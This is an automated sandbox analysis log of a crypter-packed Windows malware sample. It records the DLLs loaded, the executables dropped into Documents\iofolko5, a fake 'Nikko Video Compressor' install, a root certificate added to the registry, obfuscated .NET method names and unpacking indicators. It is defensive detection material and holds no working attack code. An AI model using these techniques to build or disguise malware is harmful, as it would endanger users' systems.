                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: shfolder.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: msacm32.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: winmmbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: winmmbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: riched20.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: usp10.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: msls31.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: explorerframe.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpSection loaded: sfc_os.dll
                              Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dll
                              Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dll
                              Source: C:\Windows\explorer.exeSection loaded: duser.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpWindow found: window name: TMainForm
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nikko Video Compressor_is1
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic file information: File size 2457088 > 1048576
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x236c00
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: .Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb# source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.PDBecti source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: d:\a42sr32\win32_x86\release\pdb\UniverseDesigner\designer.pdb source: h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000000.1616062018.0000000000525000.00000002.00000001.01000000.00000011.sdmp, h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000002.2155515118.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\exe\day2_mixApp.pdbk source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: PE.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\hSHxNXg.pdb source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.2154371709.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: HPJo8C:\Windows\day2_mixApp.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1852324342.0000000000F59000.00000004.00000010.00020000.00000000.sdmp
                              Source: Binary string: BotClient.pdb source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp
                              Source: Binary string: day2_mixApp.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmp, j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: orlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeUnpacked PE file: 12.2.pZhQ7nTCR9R3A5r5QIQYLapT.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeUnpacked PE file: 35.2.videocompressor32.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeUnpacked PE file: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.unpack
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeUnpacked PE file: 35.2.videocompressor32.exe.400000.0.unpack
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Ca01BQGh9DxiBOJwup.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: 0x9C5620ED [Tue Feb 11 12:37:01 2053 UTC]
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C3ECB7 pushfd ; ret 0_2_04C3ECC6
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C3EEC3 pushfd ; ret 0_2_04C3EEC6
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C3EF57 pushfd ; ret 0_2_04C3EF5E
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C3EF6B pushfd ; ret 0_2_04C3EF72
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_04C3E9E7 pushfd ; ret 0_2_04C3E9EE
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00567110 push ecx; ret 2_2_00567123
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeCode function: 6_2_02D42809 push eax; retf 0071h6_2_02D4280A
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_004065C8 push 00406605h; ret 8_2_004065FD
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_004040B5 push eax; ret 8_2_004040F1
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00408104 push ecx; mov dword ptr [esp], eax8_2_00408109
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00404185 push 00404391h; ret 8_2_00404389
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00404206 push 00404391h; ret 8_2_00404389
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_0040C218 push eax; ret 8_2_0040C219
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_004042E8 push 00404391h; ret 8_2_00404389
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00404283 push 00404391h; ret 8_2_00404389
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00408F38 push 00408F6Bh; ret 8_2_00408F63
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeCode function: 10_2_05A45C40 pushad ; retf 10_2_05A45C41
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeCode function: 11_2_02262809 push eax; retf 0071h11_2_0226280A
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_004014D9 pushad ; ret 12_2_004014E9
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_004031DB push eax; ret 12_2_004032AB
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_02601540 pushad ; ret 12_2_02601550
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_026D3F53 push esp; ret 12_2_026D3F55
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_026D22F6 push B63524ADh; retn 001Fh12_2_026D232D
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_026D2DF3 pushfd ; iretd 12_2_026D2DF4
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeCode function: 13_2_027B2809 push eax; retf 0071h13_2_027B280A
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeCode function: 14_2_03152809 push eax; retf 0071h14_2_0315280A
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00503196 push ecx; ret 15_2_005031A9
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004107EE push 02E98151h; retf 0000h15_2_004107F3
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00502A1C push ecx; ret 15_2_00502A2F
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, KASIU9JAUDHSAHJDUHUDASUDUADAI0DKSFISJFUDHUFHHYU.csHigh entropy of concatenated method names: 'OMFx84NSU3Aj89yeQCX', 'LAX01SNrXLuYFtkUKZE', 'iy9SsMNm29gB450FtMd', 'dBJrEtNGIa6qVBG9EBQ', 'rVg9gbNXhuTUCax3Faw', 'SqGmZ9Nwos9SN5Q7lkZ', 'GSe2iiNdiIejkDmaBS8', 'LqmMVpNxj2A5NG3wBxw', 'gYNBsNNfxAmxgoLk8AY', 'YxEaVbN7rCtxCfwOIGb'
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, psm102r62ZNKXfMgLP.csHigh entropy of concatenated method names: 'OPSws322xfEh0', 'MODr39Nq5MiabxlX31k', 'iQoS09NJ2QNv2l3Nldp', 'CJQKDaN3RqE5Z376xIt', 'pj3HvaNg4CuSslIZxHe', 'aGob5JNuDhjrh89tMF7', 'OJrIsVNcKpdpxmnyCdy', 'nvy9T7NQKdlZSSpjdYZ', 'VWEEy8N4s3YgJEZssn2', 'hiS9r5NbbCsErEIxnl5'
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Component1.csHigh entropy of concatenated method names: 'Dispose', 'c2ZnNKXfM', 'KdItahZbaqrPOGXMMIH', 'F6Y0glZWI5sNge0KygR', 'oiohBeZubh6iBGSEkrx', 'eHnLj8Z41B6OG7M1JDy', 'N4gwHqZEFQ33Xh9XSL4', 'UsxTXAZipbL0y4O7ig6', 'lWEAf5ZlGZ9tBNchonB'
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, UserControl1.csHigh entropy of concatenated method names: 'Dispose', 'F2igcbrUX', 'XHGgAUZzLmxCg9LHS8J', 'S8TWddN28E6t6e1W5DI', 'nxnywSZIvTRDeZkh3vn', 'Lg0nedZDohNDcCeYfhA', 'MCqqDaNZbmCaRq0a6S3', 'pte1vQNNcjSXyOcA1wm', 'FihZepNhpEadD2XS1mj', 'v4bBBrN14WWJwYVFB1v'
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Hg0i8ysWBkmOQpOTDa.csHigh entropy of concatenated method names: 'BBiryfpB2', 'KI0GlCWQr', 'nZK2JcQAs', 'lkTeKjlkc', 'RYq1Z9XkI', 'XOTf7va1f', 'Dispose', 'YAroKCCXX', 'acfjChBBkMo7PdIk7G', 'MFS1TWc0IT345kpNHi'
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Ca01BQGh9DxiBOJwup.csHigh entropy of concatenated method names: 'Qr5ud0NzY98AOC9xd95', 'G0Y0Wrh2oh1RhmJKSXb', 'X83AawNIkZucWFsrjDy', 'uZXqgXNDChJaWlp6NOY', 'ce4DmfsmSrOT856tDgfrkMb', 'qNiCQfbwXf', 'TgalQGhh96LsT9w8Qmj', 'Fw7QQNh18VntnfmGixE', 'ILFoXIhoc2Bm12rmWG4', 'AZNUskhyETNOaYTT1jk'

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeFile created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\5hZhKNjlLZuuPtI0L125s4tL.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\sdhsfd[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66ee79315857f_setup33333[1].exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.exe (copy)Jump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeFile created: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_iscrypt.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpFile created: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcr71.dll (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeJump to dropped file
